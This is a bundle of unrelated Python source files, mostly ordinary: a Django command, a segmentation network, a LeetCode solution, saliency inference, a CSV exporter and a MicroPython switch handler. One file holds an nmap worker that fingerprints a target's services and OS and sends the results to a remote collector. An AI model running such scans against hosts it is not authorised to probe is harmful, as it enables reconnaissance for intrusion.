1733909 | <filename>word2description/management/commands/set_games_as_finished.py
'''
Created on Mar 17, 2018
@author: alice
'''
from datetime import datetime, timedelta
from django.core.management.base import BaseCommand
from word2description.models import Game
def parse_time(time_str):
    """Convert an "HH:MM:SS" string into the equivalent timedelta.

    Raises ValueError (via strptime) for strings that are not a valid
    24-hour clock time.
    """
    parsed = datetime.strptime(time_str, "%H:%M:%S")
    return timedelta(hours=parsed.hour, minutes=parsed.minute,
                     seconds=parsed.second)
class Command(BaseCommand):
    """Management command: mark games whose end time is at least
    --inactive_period (HH:MM:SS) in the past as finished."""
    def add_arguments(self, parser):
        parser.add_argument(
            '--inactive_period',
            dest='inactive_period',
            help='Set game to finished after an inactive period.'
        )
    def handle(self, *args, **options):
        # NOTE(review): only KeyError is swallowed here; an absent option is
        # delivered by argparse as None, which makes strptime raise TypeError
        # instead -- confirm the intended no-option behavior. Also uses naive
        # utcnow(), so Game.end is presumably stored as naive UTC -- confirm.
        try:
            inactive = parse_time(options['inactive_period'])
            Game.objects.filter(end__lte=datetime.utcnow()-inactive).update(finished=True)
        except KeyError:
            pass
4838751 | from datetime import datetime
from pprint import pprint
from socket import gethostname
from threading import Thread
import nmap
from util import send_portscan
class PortscanThread(Thread):
    """Worker thread that runs an nmap scan of a target and posts the raw
    scan output back via util.send_portscan."""
    def __init__(self, destination, scan_info):
        """*scan_info* must provide 'target' and 'token'.

        NOTE(review): when keys are missing this returns early, leaving a
        half-initialized object whose run() would fail with AttributeError.
        """
        super().__init__()
        print(f"PortscanThread: initializing thread object: scan_info={scan_info}")
        if (
            "target" not in scan_info
            or "token" not in scan_info
        ):
            print(f"PortscanThread: missing information in scan_info: {scan_info}")
            return
        self.destination = destination
        self.target = scan_info["target"]
        self.token = scan_info["token"]
        self.port_range = "1-1024"
        # Alternative scan profiles kept for reference:
        # self.scan_arguments = "-sT -sU -O --host-time 300"
        self.scan_arguments = "-sT -sV -O --host-time 300"
        # self.scan_arguments = "--host-time 300"
    def process_scan(self, scan_output):
        """Forward the scan output (with hostname and timestamp) upstream."""
        status_code = send_portscan(
            gethostname(),
            self.destination,
            self.target,
            self.token,
            # NOTE(review): [:-1] trims the last character of the timestamp
            # string (a digit of the microseconds) -- presumably intentional
            # formatting for the receiver; confirm.
            str(datetime.now())[:-1],
            scan_output,
        )
        print(f"\nPortscanThread: portscan sent, result={status_code}\n")
    def run(self):
        """Execute the nmap scan and hand the result to process_scan."""
        print(f"PortscanThread: starting portscan: target = {self.target}")
        print(f"PortscanThread: starting portscan: port_range= {self.port_range}")
        print(f"PortscanThread: starting portscan: arguments = {self.scan_arguments}")
        nm = nmap.PortScanner()
        scan_output = nm.scan(
            self.target, self.port_range, arguments=self.scan_arguments
        )
        pprint(scan_output)
        self.process_scan(scan_output)
        print(f"\n\n-----> PortscanThread: competed portscan")
| StarcoderdataPython |
6453034 | <filename>pose/networks/gcn.py
import torch
import torch.nn.functional as F
from torch import nn
from torchvision import models
from pose.utils import initialize_weights
from .config import res152_path
# many are borrowed from https://github.com/ycszen/pytorch-ss/blob/master/gcn.py
class _GlobalConvModule(nn.Module):
    """Global Convolution block ("Large Kernel Matters", Peng et al. 2017).

    Approximates a dense k0 x k1 convolution by summing two separable
    branches: (k0 x 1 then 1 x k1) and (1 x k1 then k0 x 1), preserving the
    spatial size via "same" padding.
    """
    def __init__(self, in_dim, out_dim, kernel_size):
        super(_GlobalConvModule, self).__init__()
        # BUG FIX: use floor division -- plain `/` yields a float under
        # Python 3 and nn.Conv2d requires integer padding. (Also removed a
        # duplicated super().__init__() call present in the original.)
        # kernel size had better be odd number so as to avoid alignment error
        pad0 = (kernel_size[0] - 1) // 2
        pad1 = (kernel_size[1] - 1) // 2
        self.conv_l1 = nn.Conv2d(in_dim, out_dim, kernel_size=(kernel_size[0], 1),
                                 padding=(pad0, 0))
        self.conv_l2 = nn.Conv2d(out_dim, out_dim, kernel_size=(1, kernel_size[1]),
                                 padding=(0, pad1))
        self.conv_r1 = nn.Conv2d(in_dim, out_dim, kernel_size=(1, kernel_size[1]),
                                 padding=(0, pad1))
        self.conv_r2 = nn.Conv2d(out_dim, out_dim, kernel_size=(kernel_size[0], 1),
                                 padding=(pad0, 0))
    def forward(self, x):
        # Sum of the two separable large-kernel branches.
        x_l = self.conv_l1(x)
        x_l = self.conv_l2(x_l)
        x_r = self.conv_r1(x)
        x_r = self.conv_r2(x_r)
        x = x_l + x_r
        return x
class _BoundaryRefineModule(nn.Module):
    """Boundary Refinement block: identity skip plus a learned residual
    computed by conv3x3 -> ReLU -> conv3x3 (channel count unchanged)."""
    def __init__(self, dim):
        super(_BoundaryRefineModule, self).__init__()
        # Attribute names (relu/conv1/conv2) are preserved so existing
        # checkpoints keep loading into the same state_dict keys.
        self.relu = nn.ReLU(inplace=True)
        self.conv1 = nn.Conv2d(dim, dim, kernel_size=3, padding=1)
        self.conv2 = nn.Conv2d(dim, dim, kernel_size=3, padding=1)
    def forward(self, x):
        # x + Conv(ReLU(Conv(x)))
        return x + self.conv2(self.relu(self.conv1(x)))
class GCN(nn.Module):
    """Global Convolutional Network for semantic segmentation with a
    ResNet-152 backbone: GCM + BR heads on each backbone stage, fused by
    progressive bilinear upsampling back to the input resolution.

    The trailing `# N` comments give the spatial size at each stage for a
    512x512 input.
    """
    def __init__(self, num_classes, input_size, pretrained=True):
        super(GCN, self).__init__()
        self.input_size = input_size
        resnet = models.resnet152()
        if pretrained:
            # Load backbone weights from the configured local checkpoint.
            resnet.load_state_dict(torch.load(res152_path))
        self.layer0 = nn.Sequential(resnet.conv1, resnet.bn1, resnet.relu)
        self.layer1 = nn.Sequential(resnet.maxpool, resnet.layer1)
        self.layer2 = resnet.layer2
        self.layer3 = resnet.layer3
        self.layer4 = resnet.layer4
        # One global-conv module per backbone stage (deepest first).
        self.gcm1 = _GlobalConvModule(2048, num_classes, (7, 7))
        self.gcm2 = _GlobalConvModule(1024, num_classes, (7, 7))
        self.gcm3 = _GlobalConvModule(512, num_classes, (7, 7))
        self.gcm4 = _GlobalConvModule(256, num_classes, (7, 7))
        # Boundary-refine modules applied after each GCM and fusion step.
        self.brm1 = _BoundaryRefineModule(num_classes)
        self.brm2 = _BoundaryRefineModule(num_classes)
        self.brm3 = _BoundaryRefineModule(num_classes)
        self.brm4 = _BoundaryRefineModule(num_classes)
        self.brm5 = _BoundaryRefineModule(num_classes)
        self.brm6 = _BoundaryRefineModule(num_classes)
        self.brm7 = _BoundaryRefineModule(num_classes)
        self.brm8 = _BoundaryRefineModule(num_classes)
        self.brm9 = _BoundaryRefineModule(num_classes)
        initialize_weights(self.gcm1, self.gcm2, self.gcm3, self.gcm4, self.brm1, self.brm2, self.brm3,
                           self.brm4, self.brm5, self.brm6, self.brm7, self.brm8, self.brm9)
    def forward(self, x):
        # NOTE(review): F.upsample_bilinear is deprecated in modern PyTorch
        # in favor of F.interpolate(..., mode='bilinear') -- confirm the
        # targeted torch version before migrating.
        # if x: 512
        fm0 = self.layer0(x) # 256
        fm1 = self.layer1(fm0) # 128
        fm2 = self.layer2(fm1) # 64
        fm3 = self.layer3(fm2) # 32
        fm4 = self.layer4(fm3) # 16
        gcfm1 = self.brm1(self.gcm1(fm4)) # 16
        gcfm2 = self.brm2(self.gcm2(fm3)) # 32
        gcfm3 = self.brm3(self.gcm3(fm2)) # 64
        gcfm4 = self.brm4(self.gcm4(fm1)) # 128
        # Top-down fusion: upsample the deeper map and add the stage's head.
        fs1 = self.brm5(F.upsample_bilinear(gcfm1, fm3.size()[2:]) + gcfm2) # 32
        fs2 = self.brm6(F.upsample_bilinear(fs1, fm2.size()[2:]) + gcfm3) # 64
        fs3 = self.brm7(F.upsample_bilinear(fs2, fm1.size()[2:]) + gcfm4) # 128
        fs4 = self.brm8(F.upsample_bilinear(fs3, fm0.size()[2:])) # 256
        out = self.brm9(F.upsample_bilinear(fs4, self.input_size)) # 512
        return out
| StarcoderdataPython |
362982 | from typing import List
class Solution:
    """LeetCode 1438: longest continuous subarray with absolute difference
    between any two elements <= limit.

    Strategy: slide a window over the sorted *distinct values*; every window
    whose max - min <= limit is mapped back to positions in `nums`, and the
    answer is the longest run of consecutive positions covered by some window.
    """

    def longestSubarray(self, nums: List[int], limit: int) -> int:
        """Return the length of the longest qualifying subarray of nums."""
        # Map each distinct value to the (ascending) indices where it occurs.
        self.numToIdx = {}
        for i in range(len(nums)):
            if nums[i] not in self.numToIdx:
                self.numToIdx[nums[i]] = []
            self.numToIdx[nums[i]].append(i)
        sortedNums = sorted(set(nums))
        numList = []  # current window of values with max - min <= limit
        longestLen = 0
        for i in range(len(sortedNums)):
            if i == 0:
                numList.append(sortedNums[0])
            elif sortedNums[i] - numList[0] <= limit:
                numList.append(sortedNums[i])
            else:
                # Window is about to shrink: score it first.
                longestLen = max(longestLen, self.checkLength(numList))
                numList.append(sortedNums[i])
                # Drop smallest values until the window satisfies the limit.
                while sortedNums[i] - numList[0] > limit:
                    numList.pop(0)
        # BUG FIX: the final window was never scored, so inputs like
        # longestSubarray([1, 2], 5) incorrectly returned 0 instead of 2.
        if numList:
            longestLen = max(longestLen, self.checkLength(numList))
        return longestLen

    def checkLength(self, numList):
        """Return the longest run of consecutive indices whose values are all
        in numList (debug prints from the original have been removed)."""
        idxList = []
        for num in numList:
            idxList += self.numToIdx[num]
        idxList.sort()
        longestLen = 0
        curLen = 0
        prev = None
        for idx in idxList:
            # Extend the run only when indices are consecutive.
            if prev is not None and idx == prev + 1:
                curLen += 1
            else:
                curLen = 1
            if curLen > longestLen:
                longestLen = curLen
            prev = idx
        return longestLen
| StarcoderdataPython |
11246090 | <reponame>amtam0/u2netscan
import os
from skimage import io, transform
import torch
import torchvision
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms
# import torch.optim as optim
import numpy as np
from PIL import Image
import glob
# from data_loader import RescaleT
# from data_loader import ToTensor
# from data_loader import ToTensorLab
# from data_loader import SalObjDataset
from model import U2NET # full size version 173.6 MB
from model import U2NETP # small version u2net 4.7 MB
# ---- Module-level model setup: pick the small (u2netp) or full (u2net) ----
# ---- variant, load its weights (GPU when available) and switch to eval. ----
model_name = "u2netp"
if model_name=="u2netp":
    model_dir = "saved_models/u2netp/u2netp.pth"
    net = U2NETP(3,1)
else:
    model_dir = "saved_models/u2net/u2net.pth"
    net = U2NET(3,1)
if torch.cuda.is_available():
    print("CUDA")
    net.load_state_dict(torch.load(model_dir)) #ATA
    net.cuda()
else:
    # CPU fallback: remap GPU-saved tensors onto the CPU.
    net.load_state_dict(torch.load(model_dir,map_location='cpu')) #ATA
net.eval()
# normalize the predicted SOD probability map
def normPRED(d):
    """Min-max normalize the predicted saliency map to the range [0, 1]."""
    lo = torch.min(d)
    hi = torch.max(d)
    return (d - lo) / (hi - lo)
def save_output(image_name,pred,d_dir):
    """Save a predicted mask as <d_dir><original stem>.png, resized back to
    the original image's dimensions (bilinear)."""
    predict = pred
    predict = predict.squeeze()
    # Move off the GPU (if any) and convert to a numpy array in [0, 1].
    predict_np = predict.cpu().data.numpy()
    # Scale to [0, 255] and make it a 3-channel image for saving.
    im = Image.fromarray(predict_np*255).convert('RGB')
    img_name = image_name.split(os.sep)[-1]
    # Re-read the source image only to recover its (H, W) for the resize.
    image = io.imread(image_name)
    imo = im.resize((image.shape[1],image.shape[0]),resample=Image.BILINEAR)
    pb_np = np.array(imo)  # NOTE(review): unused; leftover from debugging
    # Strip the last extension while keeping any dots inside the name.
    aaa = img_name.split(".")
    bbb = aaa[0:-1]
    imidx = bbb[0]
    for i in range(1,len(bbb)):
        imidx = imidx + "." + bbb[i]
    imo.save(d_dir+imidx+'.png')
def ToTensorLab(image=None,imidx=None,label=None,flag=0):
    """Normalize an image/label pair and convert both to torch tensors (CHW).

    flag == 0: RGB only, ImageNet mean/std normalization (the path used here).
    flag == 1: Lab color space; flag == 2: RGB + Lab concatenated (6 channels).
    NOTE(review): flags 1 and 2 reference `color` (presumably skimage.color),
    which is not imported in this file's visible imports — those paths would
    raise NameError unless it is imported elsewhere; confirm before use.
    """
    tmpLbl = np.zeros(label.shape)
    # Scale the label to [0, 1] unless it is (numerically) all zeros.
    if(np.max(label)<1e-6):
        label = label
    else:
        label = label/np.max(label)
    # change the color space
    if flag == 2: # with rgb and Lab colors
        tmpImg = np.zeros((image.shape[0],image.shape[1],6))
        tmpImgt = np.zeros((image.shape[0],image.shape[1],3))
        # Broadcast grayscale input to 3 channels.
        if image.shape[2]==1:
            tmpImgt[:,:,0] = image[:,:,0]
            tmpImgt[:,:,1] = image[:,:,0]
            tmpImgt[:,:,2] = image[:,:,0]
        else:
            tmpImgt = image
        tmpImgtl = color.rgb2lab(tmpImgt)
        # nomalize image to range [0,1]
        tmpImg[:,:,0] = (tmpImgt[:,:,0]-np.min(tmpImgt[:,:,0]))/(np.max(tmpImgt[:,:,0])-np.min(tmpImgt[:,:,0]))
        tmpImg[:,:,1] = (tmpImgt[:,:,1]-np.min(tmpImgt[:,:,1]))/(np.max(tmpImgt[:,:,1])-np.min(tmpImgt[:,:,1]))
        tmpImg[:,:,2] = (tmpImgt[:,:,2]-np.min(tmpImgt[:,:,2]))/(np.max(tmpImgt[:,:,2])-np.min(tmpImgt[:,:,2]))
        tmpImg[:,:,3] = (tmpImgtl[:,:,0]-np.min(tmpImgtl[:,:,0]))/(np.max(tmpImgtl[:,:,0])-np.min(tmpImgtl[:,:,0]))
        tmpImg[:,:,4] = (tmpImgtl[:,:,1]-np.min(tmpImgtl[:,:,1]))/(np.max(tmpImgtl[:,:,1])-np.min(tmpImgtl[:,:,1]))
        tmpImg[:,:,5] = (tmpImgtl[:,:,2]-np.min(tmpImgtl[:,:,2]))/(np.max(tmpImgtl[:,:,2])-np.min(tmpImgtl[:,:,2]))
        # tmpImg = tmpImg/(np.max(tmpImg)-np.min(tmpImg))
        # Then standardize each channel to zero mean / unit variance.
        tmpImg[:,:,0] = (tmpImg[:,:,0]-np.mean(tmpImg[:,:,0]))/np.std(tmpImg[:,:,0])
        tmpImg[:,:,1] = (tmpImg[:,:,1]-np.mean(tmpImg[:,:,1]))/np.std(tmpImg[:,:,1])
        tmpImg[:,:,2] = (tmpImg[:,:,2]-np.mean(tmpImg[:,:,2]))/np.std(tmpImg[:,:,2])
        tmpImg[:,:,3] = (tmpImg[:,:,3]-np.mean(tmpImg[:,:,3]))/np.std(tmpImg[:,:,3])
        tmpImg[:,:,4] = (tmpImg[:,:,4]-np.mean(tmpImg[:,:,4]))/np.std(tmpImg[:,:,4])
        tmpImg[:,:,5] = (tmpImg[:,:,5]-np.mean(tmpImg[:,:,5]))/np.std(tmpImg[:,:,5])
    elif flag == 1: #with Lab color
        tmpImg = np.zeros((image.shape[0],image.shape[1],3))
        if image.shape[2]==1:
            tmpImg[:,:,0] = image[:,:,0]
            tmpImg[:,:,1] = image[:,:,0]
            tmpImg[:,:,2] = image[:,:,0]
        else:
            tmpImg = image
        tmpImg = color.rgb2lab(tmpImg)
        # tmpImg = tmpImg/(np.max(tmpImg)-np.min(tmpImg))
        # Min-max to [0, 1] per channel, then standardize.
        tmpImg[:,:,0] = (tmpImg[:,:,0]-np.min(tmpImg[:,:,0]))/(np.max(tmpImg[:,:,0])-np.min(tmpImg[:,:,0]))
        tmpImg[:,:,1] = (tmpImg[:,:,1]-np.min(tmpImg[:,:,1]))/(np.max(tmpImg[:,:,1])-np.min(tmpImg[:,:,1]))
        tmpImg[:,:,2] = (tmpImg[:,:,2]-np.min(tmpImg[:,:,2]))/(np.max(tmpImg[:,:,2])-np.min(tmpImg[:,:,2]))
        tmpImg[:,:,0] = (tmpImg[:,:,0]-np.mean(tmpImg[:,:,0]))/np.std(tmpImg[:,:,0])
        tmpImg[:,:,1] = (tmpImg[:,:,1]-np.mean(tmpImg[:,:,1]))/np.std(tmpImg[:,:,1])
        tmpImg[:,:,2] = (tmpImg[:,:,2]-np.mean(tmpImg[:,:,2]))/np.std(tmpImg[:,:,2])
    else: # with rgb color
        tmpImg = np.zeros((image.shape[0],image.shape[1],3))
        image = image/np.max(image)
        # ImageNet mean/std; grayscale inputs reuse the red-channel stats.
        if image.shape[2]==1:
            tmpImg[:,:,0] = (image[:,:,0]-0.485)/0.229
            tmpImg[:,:,1] = (image[:,:,0]-0.485)/0.229
            tmpImg[:,:,2] = (image[:,:,0]-0.485)/0.229
        else:
            tmpImg[:,:,0] = (image[:,:,0]-0.485)/0.229
            tmpImg[:,:,1] = (image[:,:,1]-0.456)/0.224
            tmpImg[:,:,2] = (image[:,:,2]-0.406)/0.225
    tmpLbl[:,:,0] = label[:,:,0]
    # change the r,g,b to b,r,g from [0,255] to [0,1]
    #transforms.Normalize(mean = (0.485, 0.456, 0.406), std = (0.229, 0.224, 0.225))
    # HWC -> CHW for torch.
    tmpImg = tmpImg.transpose((2, 0, 1))
    tmpLbl = label.transpose((2, 0, 1))
    return {'imidx':torch.from_numpy(imidx), 'image': torch.from_numpy(tmpImg), 'label': torch.from_numpy(tmpLbl)}
def RescaleT(image=None,imidx=None,label=None,output_size=320):
    """Resize *image* and *label* to a square (output_size x output_size).

    Aspect ratio is intentionally NOT preserved: both resize calls below use
    the square target. The label is resized with nearest-neighbor (order=0)
    and preserve_range=True so label values survive interpolation; the image
    uses the default (bilinear) order and is rescaled to [0, 1].

    Returns a dict with the keys the rest of the pipeline expects.
    """
    # Removed dead code: the original computed aspect-preserving new_h/new_w
    # from h, w and output_size, then never used them in the resize calls.
    img = transform.resize(image, (output_size, output_size), mode='constant')
    lbl = transform.resize(label, (output_size, output_size), mode='constant',
                           order=0, preserve_range=True)
    return {'imidx': imidx, 'image': img, 'label': lbl}
def SalObjDataset(img_name_list=None,lbl_name_list=None,idx=0):
    """Load sample *idx*: read the image (and label, when a label list is
    given) and shape both to HWC with the label single-channel.

    NOTE(review): the lbl_name_list=None default would crash on len(None);
    callers here always pass [] — confirm before relying on the default.
    The bare print() calls look like leftover debugging output.
    """
    image = io.imread(img_name_list[idx])
    imname = img_name_list[idx]
    imidx = np.array([idx])
    # No labels supplied: substitute an all-zero label of the image's shape.
    if(0==len(lbl_name_list)):
        print("0==len(lbl_name_list)")
        label_3 = np.zeros(image.shape)
    else:
        label_3 = io.imread(lbl_name_list[idx])
    # Collapse the label to a single channel.
    label = np.zeros(label_3.shape[0:2])
    if(3==len(label_3.shape)):
        print("3==len(label_3.shape)")
        label = label_3[:,:,0]
    elif(2==len(label_3.shape)):
        print("2==len(label_3.shape)")
        label = label_3
    # Ensure both arrays carry an explicit channel axis (HWC).
    if(3==len(image.shape) and 2==len(label.shape)):
        label = label[:,:,np.newaxis]
        print("3==len(image.shape) and 2==len(label.shape)")
    elif(2==len(image.shape) and 2==len(label.shape)):
        image = image[:,:,np.newaxis]
        label = label[:,:,np.newaxis]
        print("2==len(image.shape) and 2==len(label.shape)")
    return {'imidx':imidx, 'image':image, 'label':label}
def main(model_name="u2netp",image_dir = "/tmp/in_data/",prediction_dir = "/tmp/out_data/"):
    """Run salient-object inference on the first image in *image_dir* and
    write the predicted mask PNG into *prediction_dir*.

    NOTE(review): only idx=0 is processed (the DataLoader loop is commented
    out), and `model_dir` computed below is unused — the network `net` is
    loaded once at module import time.
    """
    # --------- 1. get image path and name ---------
    if model_name=="u2netp":
        model_dir = "saved_models/u2netp/u2netp.pth"
    else:
        model_dir = "saved_models/u2net/u2net.pth"
    img_name_list = glob.glob(image_dir + os.sep + '*')
    print(img_name_list)
    # --------- 2. dataloader ---------
    #1. dataloader
    # test_salobj_dataset = SalObjDataset(img_name_list = img_name_list,
    #                                     lbl_name_list = [],
    #                                     transform=transforms.Compose([RescaleT(320),
    #                                                                   ToTensorLab(flag=0)])
    #                                     )
    # test_salobj_dataloader = DataLoader(test_salobj_dataset,
    #                                     batch_size=1,
    #                                     shuffle=False,
    #                                     num_workers=1)
    ###ATA####
    # Manual pipeline replacing the DataLoader: load -> rescale -> to-tensor.
    sample = SalObjDataset(img_name_list=img_name_list,lbl_name_list=[],idx=0)
    imidx,image,label = sample["imidx"],sample["image"],sample["label"]
    sample = RescaleT(image=image,imidx=imidx,label=label,output_size=320)
    imidx,image,label = sample["imidx"],sample["image"],sample["label"]
    data_test = ToTensorLab(image=image,imidx=imidx,label=label,flag=0)
    ###ATA####
    # --------- 3. model define ---------
    # Dead code kept for reference: model loading now happens at module level.
    """if(model_name=='u2net'):
        print("...load U2NET---173.6 MB")
        net = U2NET(3,1)
    elif(model_name=='u2netp'):
        print("...load U2NEP---4.7 MB")
        net = U2NETP(3,1)
    if torch.cuda.is_available():
        print("CUDA")
        net.load_state_dict(torch.load(model_dir)) #ATA ,map_location='cpu'
        net.cuda()
    else:
        net.load_state_dict(torch.load(model_dir,map_location='cpu')) #ATA
    net.eval()
    """
    print("MODEL LOADED OK")
    # --------- 4. inference for each image ---------
    # for i_test, data_test in enumerate(test_salobj_dataloader):
    print("inferencing:",img_name_list[imidx[0]].split(os.sep)[-1])
    inputs_test = data_test['image']
    inputs_test = inputs_test.type(torch.FloatTensor)
    if torch.cuda.is_available():
        inputs_test = Variable(inputs_test.cuda())
    else:
        inputs_test = Variable(inputs_test)
    # Add the batch dimension in place before the forward pass.
    d1,d2,d3,d4,d5,d6,d7= net(inputs_test.unsqueeze_(0)) #ATA add .unsqueeze_(0)
    # normalization
    pred = d1[:,0,:,:]
    pred = normPRED(pred)
    # save results to prediction_dir folder
    if not os.path.exists(prediction_dir):
        os.makedirs(prediction_dir, exist_ok=True)
    save_output(img_name_list[imidx[0]],pred,prediction_dir)
    # Free the intermediate side outputs.
    del d1,d2,d3,d4,d5,d6,d7
# if __name__ == "__main__":
# main()
| StarcoderdataPython |
1857355 | <filename>scripts/json2testlinkCsv.py
#!/usr/bin/python
# Goal : to extract dictionnary in an xlsx file from a list of requirements
from pyReq import *
import argparse
class ReqGetXlsx(pyReq):
    """Export requirements as a CSV file importable by the TestLink tool.

    The goal is to be able to enter requirements into TestLink from the
    JSON requirements file loaded by the pyReq base class.
    """

    def get_testlink_csv(self, listOfReq=None, testlinkFileName='getReq.csv'):
        """Write the selected requirements to a TestLink-compatible CSV file.

        :arg listOfReq: requirement tags to export; all requirements when
            empty or None (None default avoids the mutable-default idiom)
        :type listOfReq: list
        :arg testlinkFileName: output csv file path for TestLink
        :type testlinkFileName: string
        """
        # Empty/missing selection means "export every known requirement".
        if not listOfReq:
            listOfReq = self.reqDict.keys()
        # Context manager guarantees the handle is closed even if a tag
        # lookup fails mid-export (the original leaked it on error).
        # Debug print statements were removed.
        with open(testlinkFileName, 'w') as fp:
            for tag in listOfReq:
                # TestLink import row, e.g.:
                # "RQT_X_0001","RQT_X_0001","<requirement body>",1,"F",1,1
                fp.write('"%s","%s","%s",1,"F",1,1\n'%(tag,tag,self.reqDict[tag][C_KEY_BODY]))
        print("Write csv file %s"%testlinkFileName)
def test():
    """Manual smoke test against the example requirements database.

    Example 1 exports sprint-2 requirements that have no coverage yet;
    example 2 exports requirements whose status attribute is "KO".
    """
    getReqInstance = ReqGetXlsx(C_PATH_WORK+"docExample.json")
    #listOfTags = ['RQT_0001','RQT_0003']
    #print(getReqInstance.getKeys())
    # Example 1 : get all requirements not covered of sprint 2 : what validation team has to do
    listOfTagsSprint2 = getReqInstance.getListReqFromAttribute("attributeSprint", 2)
    for tag in listOfTagsSprint2:
        if getReqInstance[tag][C_KEY_COVERAGE] == []:
            print("%s Not covered"%tag)
    getReqInstance.get_testlink_csv(listOfTagsSprint2, C_PATH_OUT+'reqListSprint2NotCovered.csv')
    # Example 2 : get all requirements covered by a KO test : what development team has to do
    listOfTagsSprint1 = getReqInstance.getListReqFromAttribute("attributeStatus", "KO")
    getReqInstance.get_testlink_csv(listOfTagsSprint1, C_PATH_OUT+'reqListStatusKO.csv')
if __name__ == '__main__':
    #test()
    # CLI entry point: convert a JSON requirements file into a TestLink CSV.
    parser = argparse.ArgumentParser(description='json2testlinkCsv %s\docExample.json %s\testlinkInput.csv'%(C_PATH_WORK, C_PATH_OUT))
    parser.add_argument('jsonFileInput', action="store")
    parser.add_argument('testlinkcsvFileOutput', action="store")
    result = parser.parse_args()
    arguments = dict(result._get_kwargs())
    #print(arguments['xlsxFileInput'])
    #print(arguments['jsonFileOutput'])
    getReqInstance = ReqGetXlsx(arguments['jsonFileInput'])
    #listOfTagsSprint1 = getReqInstance.getListReqFromAttribute("attributeStatus", "KO")
    # Empty list => export every requirement from the input file.
    getReqInstance.get_testlink_csv([], arguments['testlinkcsvFileOutput'])
    del(getReqInstance)
| StarcoderdataPython |
1655136 | ################################################################################
# filename: switch_skill.py
# date: 07. Apr. 2021
# username: winkste
# name: <NAME>
# description: This module handles the input signal of a switch.
# In the first implementation it will only support polling of an
# input pin. In future implementations also reacting on interrupts
# shall be possible, therefore a mode variable is defined and
# handed over to the object during construction
#
#
#
################################################################################
################################################################################
# Imports
import time
from src.skills.abs_skill import AbstractSkill
from src.mqtt.user_subs import UserSubs
from src.mqtt.user_pubs import UserPubs
import machine
import src.utils.trace as T
################################################################################
# Variables
# Sentinel meaning "pin not configured".
_NO_VALUE = 0xff
# Delay in milliseconds after which a published 'ON' is followed by 'OFF'.
_SWITCH_OFF_TIME = 1000
# Detection modes (only polling is implemented; ISR reserved for the future).
SWITCH_SKILL_MODE_POLL = 0
SWITCH_SKILL_MODE_ISR = 1
# Logical switch states.
_SWITCH_STATE_LOW = 0
_SWITCH_STATE_HIGH = 1
_SWITCH_STATE_INIT = 0xff
# Maps a state to its inverse, used for inverted LED display.
_SWITCH_STATE_DICT_INV = {
    _SWITCH_STATE_LOW: _SWITCH_STATE_HIGH,
    _SWITCH_STATE_HIGH: _SWITCH_STATE_LOW,
}
################################################################################
# Functions
################################################################################
# Classes
################################################################################
# @brief This is the switch skill, handling a switch input signal
################################################################################
class SwitchSkill(AbstractSkill):
    ############################################################################
    # Member Attributes (class-level defaults)
    _pub_state = None                      # UserPubs publisher for switch events
    _publish_state = True                  # request flag: publish 'ON' next cycle
    _current_state = _SWITCH_STATE_INIT
    _switch_pin = _NO_VALUE
    _led_pin = _NO_VALUE
    _switch_gpio = None
    _led_gpio = None
    _led_inf = False
    _swith_mode = SWITCH_SKILL_MODE_POLL   # NOTE: legacy misspelled default;
                                           # __init__ sets self._switch_mode
    _switch_trigger = _SWITCH_STATE_HIGH
    _switch_state_published = True
    # BUGFIX: default timestamp for the 'OFF' timeout check. This attribute
    # was previously only created after the first publish, so with the
    # default _switch_state_published=True the very first execute_skill()
    # call raised AttributeError inside time.ticks_diff().
    _last_time = 0
    ############################################################################
    # Member Functions
    ############################################################################
    # @brief    constructor of the switch skill object
    # @param    dev_id          device identification
    # @param    skill_entity    skill entity if multiple skills are generated
    # @param    switch_pin      switch input pin
    # @param    switch_mode     switch detection mode, currently only poll supported
    # @param    led_pin         led pin displaying the switch state
    # @param    led_inv         led inverse state displaying
    # @return   none
    ############################################################################
    def __init__(self, dev_id, skill_entity, switch_pin,
                 switch_mode=SWITCH_SKILL_MODE_POLL, led_pin=_NO_VALUE,
                 led_inv=False):
        super().__init__(dev_id, skill_entity)
        self._skill_name = "SWITCH skill"
        self._pub_state = UserPubs("switch/triggered", dev_id, "std", skill_entity)
        self._switch_pin = switch_pin
        self._led_pin = led_pin
        self._led_inf = led_inv
        self._switch_mode = switch_mode
        self._switch_gpio = None
        self._led_gpio = None
        # Trigger on the low level of the input signal (active-low switch).
        self._switch_trigger = _SWITCH_STATE_LOW
    ############################################################################
    # @brief    starts the skill: configure the switch input and LED output pins
    # @return   none
    ############################################################################
    def start_skill(self):
        global _NO_VALUE
        if self._switch_pin != _NO_VALUE:
            self._switch_gpio = machine.Pin(self._switch_pin, machine.Pin.IN)
        if self._led_pin != _NO_VALUE:
            self._led_gpio = machine.Pin(self._led_pin, machine.Pin.OUT)
            T.trace(__name__, T.DEBUG, 'led pin configured: ' + str(self._led_pin))
    ############################################################################
    # @brief    checks the switch state transition; on a transition to the
    #           trigger level requests a publish, and mirrors the state on
    #           the LED (optionally inverted)
    # @return   none
    ############################################################################
    def _check_switch_state_transition(self):
        if self._switch_gpio != None:
            new_switch_state = self._switch_gpio.value()
            T.trace(__name__, T.DEBUG, 'SWITCH signal:' + str(new_switch_state))
            if new_switch_state != self._current_state:
                self._current_state = new_switch_state
                T.trace(__name__, T.DEBUG, 'state transition detected...')
                if new_switch_state == self._switch_trigger:
                    self._publish_state = True
                if self._led_gpio != None:
                    if self._led_inf == False:
                        self._led_gpio.value(self._current_state)
                        T.trace(__name__, T.DEBUG, 'led state:' + str(self._current_state))
                    else:
                        self._led_gpio.value(_SWITCH_STATE_DICT_INV[self._current_state])
                        T.trace(__name__, T.DEBUG, 'led state:' + str(_SWITCH_STATE_DICT_INV[self._current_state]))
    ############################################################################
    # @brief    executes the skill cyclic task: publishes 'ON' on a trigger
    #           transition and 'OFF' once _SWITCH_OFF_TIME ms have elapsed
    # @return   none
    ############################################################################
    def execute_skill(self):
        current_time = time.ticks_ms()
        # check if we need to switch back 'ON' to 'OFF' state after time X
        if self._switch_state_published:
            if abs(time.ticks_diff(current_time, self._last_time)) > _SWITCH_OFF_TIME:
                self._pub_state.publish('OFF')
                self._switch_state_published = False
        self._check_switch_state_transition()
        if self._publish_state == True:
            self._publish_state = False
            self._pub_state.publish('ON')
            self._last_time = current_time
            self._switch_state_published = True
    ############################################################################
    # @brief    executes the incoming subscription callback handler; this
    #           skill subscribes to nothing, so any callback is an error
    # @param    topic   topic identifier of the messsage
    # @param    payload payload of the message
    # @return   none
    ############################################################################
    def execute_subscription(self, topic, data):
        T.trace(__name__, T.ERROR, 'unexpected subscription')
        T.trace(__name__, T.DEBUG, 'topic: ' + topic)
